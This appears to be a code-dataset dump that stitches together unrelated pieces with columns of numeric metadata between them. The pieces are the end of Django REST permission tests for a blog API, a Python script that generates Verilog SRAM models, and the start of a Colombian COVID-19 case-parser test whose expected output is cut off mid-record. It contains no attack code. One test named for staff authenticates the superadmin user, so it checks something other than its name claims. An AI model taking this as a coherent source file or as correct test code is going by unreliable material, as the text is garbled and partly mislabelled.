post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
slug = 'patching'
self.client.force_authenticate(user=self.user)
response = self.client.patch(url, {'slug': slug}, format='json')
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
def test_patch_post_staff(self):
""" Test patch method for staff is successful. """
post = G(Post, author=self.user, published=True)
slug = post.slug
logger.info("%s" % slug)
url = reverse('blog:detail', kwargs={'slug': slug})
slug = 'patching'
self.client.force_authenticate(user=self.staff)
response = self.client.patch(url, {'slug': slug}, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data['slug'], slug)
def test_patch_post_superadmin(self):
""" Test patch method for superadmin is successful. """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
slug = 'patching'
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.patch(url, {'slug': slug}, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data['slug'], slug)
def test_put_post_superadmin(self):
""" Test put method is successful for superadmin . """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
post.slug = 'putting'
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.put(url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data['slug'], serializer.data['slug'])
def test_put_post_staff(self):
""" Test put method is successful for staff. """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
post.slug = 'putting'
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.put(url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data['slug'], serializer.data['slug'])
def test_put_fail_not_published_post_user(self):
""" Test put method fails for normal user on non published post. """
post = G(Post, author=self.user, published=False)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
serializer = PostSerializer(post)
logger.info("fdsfdsfd")
self.client.force_authenticate(user=None)
self.client.force_authenticate(user=self.user)
response = self.client.put(url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
def test_put_fail_published_post_user(self):
""" Test put method fails for normal user on published post. """
post = G(Post, author=self.user, published=True)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
serializer = PostSerializer(post)
self.client.force_authenticate(user=None)
self.client.force_authenticate(user=self.user)
response = self.client.put(url, serializer.data, format='json')
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_fail_post_user(self):
""" Test delete method fails for authenticated users. """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
self.client.force_authenticate(user=self.user)
response = self.client.delete(url, format='json')
self.assertEquals(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_post_staff(self):
""" Test delete method is successful for staff. """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
self.client.force_authenticate(user=self.staff)
response = self.client.delete(url, format='json')
self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)
def test_delete_post_superadmin(self):
""" Test delete method is successful for superadmin. """
post = G(Post, author=self.user)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.delete(url, format='json')
self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)
def test_get_post_anonymous_user(self):
""" Test get method is successful for an anonymous user. """
post = G(Post, author=self.user, published=True)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
serializer = PostSerializer(post)
response = self.client.get(url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data, serializer.data)
def test_get_post_404_for_non_published_anonymous_user(self):
"""
Test get post only get published posts for an anonymous user.
create non published posts -> get it -> 404.
"""
post = G(Post, author=self.user, published=False)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
response = self.client.get(url, format='json')
self.assertEquals(response.status_code, status.HTTP_404_NOT_FOUND)
def test_get_post_not_published_staff(self):
""" Test get method on non published post by staff is successful. """
post = G(Post, author=self.user, published=False)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.staff)
response = self.client.get(url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data, serializer.data)
def test_get_post_not_published_superadmin(self):
""" Test get method on non published post by superadmin is successful. """
post = G(Post, author=self.user, published=False)
slug = post.slug
url = reverse('blog:detail', kwargs={'slug': slug})
serializer = PostSerializer(post)
self.client.force_authenticate(user=self.superadmin_not_staff)
response = self.client.get(url, format='json')
self.assertEquals(response.status_code, status.HTTP_200_OK)
self.assertEquals(response.data, serializer.data)
| 49.339207
| 117
| 0.679464
| 2,905
| 22,400
| 5.10568
| 0.057831
| 0.046386
| 0.05414
| 0.073827
| 0.899002
| 0.885585
| 0.871561
| 0.858954
| 0.852481
| 0.842166
| 0
| 0.010091
| 0.203705
| 22,400
| 453
| 118
| 49.448124
| 0.821439
| 0.121473
| 0
| 0.818182
| 0
| 0
| 0.042055
| 0
| 0
| 0
| 0
| 0
| 0.173021
| 1
| 0.117302
| false
| 0.008798
| 0.026393
| 0
| 0.158358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
819035ea9d257d6f5d59c74469bb51fba954e4ae
| 6,899
|
py
|
Python
|
scripts/utils/generate_verilog.py
|
jjcherry56/bsg_fakeram
|
26371e268ff5a98389f97a8662e3f1e28a19fd97
|
[
"BSD-3-Clause"
] | 16
|
2019-09-14T22:55:32.000Z
|
2022-02-17T04:21:42.000Z
|
scripts/utils/generate_verilog.py
|
jjcherry56/bsg_fakeram
|
26371e268ff5a98389f97a8662e3f1e28a19fd97
|
[
"BSD-3-Clause"
] | 13
|
2019-09-25T15:16:22.000Z
|
2021-12-30T07:56:58.000Z
|
scripts/utils/generate_verilog.py
|
jjcherry56/bsg_fakeram
|
26371e268ff5a98389f97a8662e3f1e28a19fd97
|
[
"BSD-3-Clause"
] | 9
|
2019-09-16T21:50:44.000Z
|
2022-03-20T11:45:15.000Z
|
import os
import math
################################################################################
# GENERATE VERILOG VIEW
#
# Generate a .v file based on the given SRAM.
################################################################################
def generate_verilog( mem ):
name = str(mem.name)
depth = int(mem.depth)
bits = int(mem.width_in_bits)
num_rwport = mem.rw_ports
addr_width = math.ceil(math.log2(depth))
V_file = open(os.sep.join([mem.results_dir, name + '.v']), 'w')
V_file.write('module %s\n' % name)
V_file.write('(\n')
for i in range(int(num_rwport)) :
V_file.write(' rd_out,\n')
for i in range(int(num_rwport)) :
V_file.write(' addr_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' we_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' wd_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' w_mask_in,\n')
V_file.write(' clk,\n')
V_file.write(' ce_in\n')
V_file.write(');\n')
V_file.write(' parameter BITS = %s;\n' % str(bits))
V_file.write(' parameter WORD_DEPTH = %s;\n' % str(depth))
V_file.write(' parameter ADDR_WIDTH = %s;\n' % str(addr_width))
V_file.write(' parameter corrupt_mem_on_X_p = 1;\n')
V_file.write('\n')
for i in range(int(num_rwport)) :
V_file.write(' output reg [BITS-1:0] rd_out;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [ADDR_WIDTH-1:0] addr_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input we_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [BITS-1:0] wd_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [BITS-1:0] w_mask_in;\n')
V_file.write(' input clk;\n')
V_file.write(' input ce_in;\n')
V_file.write('\n')
V_file.write(' reg [BITS-1:0] mem [0:WORD_DEPTH-1];\n')
V_file.write('\n')
V_file.write(' integer j;\n')
V_file.write('\n')
V_file.write(' always @(posedge clk)\n')
V_file.write(' begin\n')
V_file.write(' if (ce_in)\n')
V_file.write(' begin\n')
for i in range(int(num_rwport)) :
V_file.write(" //if ((we_in !== 1'b1 && we_in !== 1'b0) && corrupt_mem_on_X_p)\n")
V_file.write(' if (corrupt_mem_on_X_p &&\n')
V_file.write(" ((^we_in === 1'bx) || (^addr_in === 1'bx))\n")
V_file.write(' )\n')
V_file.write(' begin\n')
V_file.write(' // WEN or ADDR is unknown, so corrupt entire array (using unsynthesizeable for loop)\n')
V_file.write(' for (j = 0; j < WORD_DEPTH; j = j + 1)\n')
V_file.write(" mem[j] <= 'x;\n")
V_file.write(' $display("warning: ce_in=1, we_in is %b, addr_in = %x in ' + name + '", we_in, addr_in);\n')
V_file.write(' end\n')
V_file.write(' else if (we_in)\n')
V_file.write(' begin\n')
V_file.write(' mem[addr_in] <= (wd_in & w_mask_in) | (mem[addr_in] & ~w_mask_in);\n')
V_file.write(' end\n')
V_file.write(' // read\n')
for i in range(int(num_rwport)) :
V_file.write(' rd_out <= mem[addr_in];\n')
V_file.write(' end\n')
V_file.write(' else\n')
V_file.write(' begin\n')
V_file.write(" // Make sure read fails if ce_in is low\n")
V_file.write(" rd_out <= 'x;\n")
V_file.write(' end\n')
V_file.write(' end\n')
V_file.write('\n')
V_file.write(' // Timing check placeholders (will be replaced during SDF back-annotation)\n')
V_file.write(' reg notifier;\n')
V_file.write(' specify\n')
V_file.write(' // Delay from clk to rd_out\n')
V_file.write(' (posedge clk *> rd_out) = (0, 0);\n')
V_file.write('\n')
V_file.write(' // Timing checks\n')
V_file.write(' $width (posedge clk, 0, 0, notifier);\n')
V_file.write(' $width (negedge clk, 0, 0, notifier);\n')
V_file.write(' $period (posedge clk, 0, notifier);\n')
V_file.write(' $setuphold (posedge clk, we_in, 0, 0, notifier);\n')
V_file.write(' $setuphold (posedge clk, ce_in, 0, 0, notifier);\n')
V_file.write(' $setuphold (posedge clk, addr_in, 0, 0, notifier);\n')
V_file.write(' $setuphold (posedge clk, wd_in, 0, 0, notifier);\n')
V_file.write(' $setuphold (posedge clk, w_mask_in, 0, 0, notifier);\n')
V_file.write(' endspecify\n')
V_file.write('\n')
V_file.write('endmodule\n')
V_file.close()
################################################################################
# GENERATE VERILOG BLACKBOX VIEW
#
# Generate a .bb.v file based on the given SRAM. This is the same as the
# standard verilog view but only has the module definition and port
# declarations (no internal logic).
################################################################################
def generate_verilog_bb( mem ):
name = str(mem.name)
depth = int(mem.depth)
bits = int(mem.width_in_bits)
num_rwport = mem.rw_ports
addr_width = math.ceil(math.log2(depth))
V_file = open(os.sep.join([mem.results_dir, name + '.bb.v']), 'w')
V_file.write('module %s\n' % name)
V_file.write('(\n')
for i in range(int(num_rwport)) :
V_file.write(' rd_out,\n')
for i in range(int(num_rwport)) :
V_file.write(' addr_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' we_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' wd_in,\n')
for i in range(int(num_rwport)) :
V_file.write(' w_mask_in,\n')
V_file.write(' clk,\n')
V_file.write(' ce_in\n')
V_file.write(');\n')
V_file.write(' parameter BITS = %s;\n' % str(bits))
V_file.write(' parameter WORD_DEPTH = %s;\n' % str(depth))
V_file.write(' parameter ADDR_WIDTH = %s;\n' % str(addr_width))
V_file.write(' parameter corrupt_mem_on_X_p = 1;\n')
V_file.write('\n')
for i in range(int(num_rwport)) :
V_file.write(' output reg [BITS-1:0] rd_out;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [ADDR_WIDTH-1:0] addr_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input we_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [BITS-1:0] wd_in;\n')
for i in range(int(num_rwport)) :
V_file.write(' input [BITS-1:0] w_mask_in;\n')
V_file.write(' input clk;\n')
V_file.write(' input ce_in;\n')
V_file.write('\n')
V_file.write('endmodule\n')
V_file.close()
| 42.58642
| 124
| 0.530077
| 1,062
| 6,899
| 3.234463
| 0.119586
| 0.149927
| 0.282387
| 0.208151
| 0.803202
| 0.770015
| 0.769141
| 0.747889
| 0.711208
| 0.629403
| 0
| 0.009831
| 0.262792
| 6,899
| 161
| 125
| 42.850932
| 0.665553
| 0.038701
| 0
| 0.708029
| 1
| 0.007299
| 0.420025
| 0.003332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014599
| false
| 0
| 0.014599
| 0
| 0.029197
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8198569eeff248878341fd00b0f50d3c6856c165
| 39,780
|
py
|
Python
|
ingestion/functions/parsing/colombia/colombia_test.py
|
open-covid-data/healthmap-gdo-temp
|
5af5c9e2f7dcefa9039dc6b3a2e2c5094566fc2e
|
[
"MIT"
] | 5
|
2020-04-16T13:54:24.000Z
|
2020-07-06T13:42:10.000Z
|
ingestion/functions/parsing/colombia/colombia_test.py
|
open-covid-data/healthmap-gdo-temp
|
5af5c9e2f7dcefa9039dc6b3a2e2c5094566fc2e
|
[
"MIT"
] | 487
|
2020-04-16T00:56:09.000Z
|
2020-07-27T09:09:29.000Z
|
ingestion/functions/parsing/colombia/colombia_test.py
|
open-covid-data/healthmap-gdo-temp
|
5af5c9e2f7dcefa9039dc6b3a2e2c5094566fc2e
|
[
"MIT"
] | null | null | null |
import os
import unittest
from colombia import colombia
_SOURCE_ID = "placeholder_ID"
_SOURCE_URL = "placeholder_URL"
class ColombiaTest(unittest.TestCase):
def setUp(self):
self.maxDiff = 150000
def test_parse(self):
'''
Includes imported and internally transmitted cases
'''
current_dir = os.path.dirname(__file__)
sample_data_file = os.path.join(current_dir, "sample_data.csv")
result = colombia.parse_cases(
sample_data_file, _SOURCE_ID, _SOURCE_URL)
self.assertCountEqual(
list(result),
[{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '1',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 19.0, 'end': 19.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '02/27/2020Z', 'end': '02/27/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/13/2020Z', 'end': '03/13/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'IT',
'geoResolution': 'Country',
'name': 'Italy',
'geometry': {'latitude': 41.87194, 'longitude': 12.56738}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ITALIA., Symptom severity was Mild, Date reported online was 03/06/2020., Date reported to SIVIGILA was 03/02/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '2',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BUGA, VALLE DEL CAUCA, Colombia',
'geometry': {'latitude': 3.85524552901928, 'longitude': -76.1051444045495},
'administrativeAreaLevel1': 'VALLE DEL CAUCA',
'administrativeAreaLevel2': 'BUGA'},
'demographics': {'ageRange': {'start': 34.0, 'end': 34.0},
'gender': 'Male',
'ethnicity': 'Black'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/09/2020Z', 'end': '03/09/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/04/2020Z', 'end': '03/04/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/19/2020Z', 'end': '03/19/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/09/2020., Date reported to SIVIGILA was 03/06/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '3',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'MEDELLÍN, ANTIOQUIA, Colombia',
'geometry': {'latitude': 6.25759027927781, 'longitude': -75.6110318154478},
'administrativeAreaLevel1': 'ANTIOQUIA',
'administrativeAreaLevel2': 'MEDELLÍN'},
'demographics': {'ageRange': {'start': 50.0, 'end': 50.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/09/2020Z', 'end': '03/09/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '02/29/2020Z', 'end': '02/29/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/15/2020Z', 'end': '03/15/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/09/2020., Date reported to SIVIGILA was 03/07/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '4',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'MEDELLÍN, ANTIOQUIA, Colombia',
'geometry': {'latitude': 6.25759027927781, 'longitude': -75.6110318154478},
'administrativeAreaLevel1': 'ANTIOQUIA',
'administrativeAreaLevel2': 'MEDELLÍN'},
'demographics': {'ageRange': {'start': 55.0, 'end': 55.0},
'gender': 'Male',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/26/2020Z', 'end': '03/26/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/09/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '5',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'MEDELLÍN, ANTIOQUIA, Colombia',
'geometry': {'latitude': 6.25759027927781, 'longitude': -75.6110318154478},
'administrativeAreaLevel1': 'ANTIOQUIA',
'administrativeAreaLevel2': 'MEDELLÍN'},
'demographics': {'ageRange': {'start': 25.0, 'end': 25.0},
'gender': 'Male',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/08/2020Z', 'end': '03/08/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/23/2020Z', 'end': '03/23/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/09/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '6',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'ITAGÜÍ, ANTIOQUIA, Colombia',
'geometry': {'latitude': 6.17927953587734, 'longitude': -75.614203758093},
'administrativeAreaLevel1': 'ANTIOQUIA',
'administrativeAreaLevel2': 'ITAGÜÍ'},
'demographics': {'ageRange': {'start': 27.0, 'end': 27.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/26/2020Z', 'end': '03/26/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'notes': 'Patient self-isolated and recovered at home., Case was transmitted within Colombia., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/10/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '7',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'CARTAGENA DE INDIAS, BOLÍVAR, Colombia',
'geometry': {'latitude': 10.4634301173375, 'longitude': -75.4588996435526},
'administrativeAreaLevel1': 'BOLÍVAR',
'administrativeAreaLevel2': 'CARTAGENA DE INDIAS'},
'demographics': {'ageRange': {'start': 85.0, 'end': 85.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/02/2020Z', 'end': '03/02/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/17/2020Z', 'end': '03/17/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'US',
'geoResolution': 'Country',
'name': 'United States',
'geometry': {'latitude': 37.09024, 'longitude': -95.712891}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESTADOS UNIDOS DE AMÉRICA., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/08/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '8',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 22.0, 'end': 22.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/21/2020Z', 'end': '03/21/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/09/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '9',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 28.0, 'end': 28.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/11/2020Z', 'end': '03/11/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/07/2020Z', 'end': '03/07/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/23/2020Z', 'end': '03/23/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/11/2020., Date reported to SIVIGILA was 03/08/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '10',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 36.0, 'end': 36.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/12/2020Z', 'end': '03/12/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/21/2020Z', 'end': '03/21/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/12/2020., Date reported to SIVIGILA was 03/12/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '11',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'BOGOTÁ, D.C., BOGOTÁ, D.C., Colombia',
'geometry': {'latitude': 4.31610770770964, 'longitude': -74.1810727121648},
'administrativeAreaLevel1': 'BOGOTÁ, D.C.',
'administrativeAreaLevel2': 'BOGOTÁ, D.C.'},
'demographics': {'ageRange': {'start': 42.0, 'end': 42.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/12/2020Z', 'end': '03/12/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '03/31/2020Z', 'end': '03/31/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'ES',
'geoResolution': 'Country',
'name': 'Spain',
'geometry': {'latitude': 40.463667, 'longitude': -3.74922}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ESPAÑA., Symptom severity was Mild, Date reported online was 03/12/2020., Date reported to SIVIGILA was 03/11/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
'sourceEntryId': '12',
'sourceUrl': 'placeholder_URL'},
'location': {'country': 'Colombia',
'geoResolution': 'Admin2',
'name': 'NEIVA, HUILA, Colombia',
'geometry': {'latitude': 2.99336002479853, 'longitude': -75.272362338162},
'administrativeAreaLevel1': 'HUILA',
'administrativeAreaLevel2': 'NEIVA'},
'demographics': {'ageRange': {'start': 74.0, 'end': 74.0},
'gender': 'Female',
'ethnicity': 'Other'},
'events': [{'name': 'confirmed',
'dateRange': {'start': '03/12/2020Z', 'end': '03/12/2020Z'}},
{'name': 'onsetSymptoms',
'dateRange': {'start': '03/06/2020Z', 'end': '03/06/2020Z'}},
{'name': 'outcome',
'value': 'Recovered',
'dateRange': {'start': '04/09/2020Z', 'end': '04/09/2020Z'}}],
'symptoms': {'status': 'Symptomatic'},
'travelHistory': {'traveledPrior30Days': True,
'travel': [{'location': {'country': 'IT',
'geoResolution': 'Country',
'name': 'Italy',
'geometry': {'latitude': 41.87194, 'longitude': 12.56738}}}]},
'notes': 'Patient self-isolated and recovered at home., Case is reported as importing the disease into Colombia, and country of origin is ITALIA., Symptom severity was Mild, Date reported online was 03/12/2020., Date reported to SIVIGILA was 03/10/2020., Patient recovery was confirmed by a negative PCR test.'},
{'caseReference': {'sourceId': 'placeholder_ID',
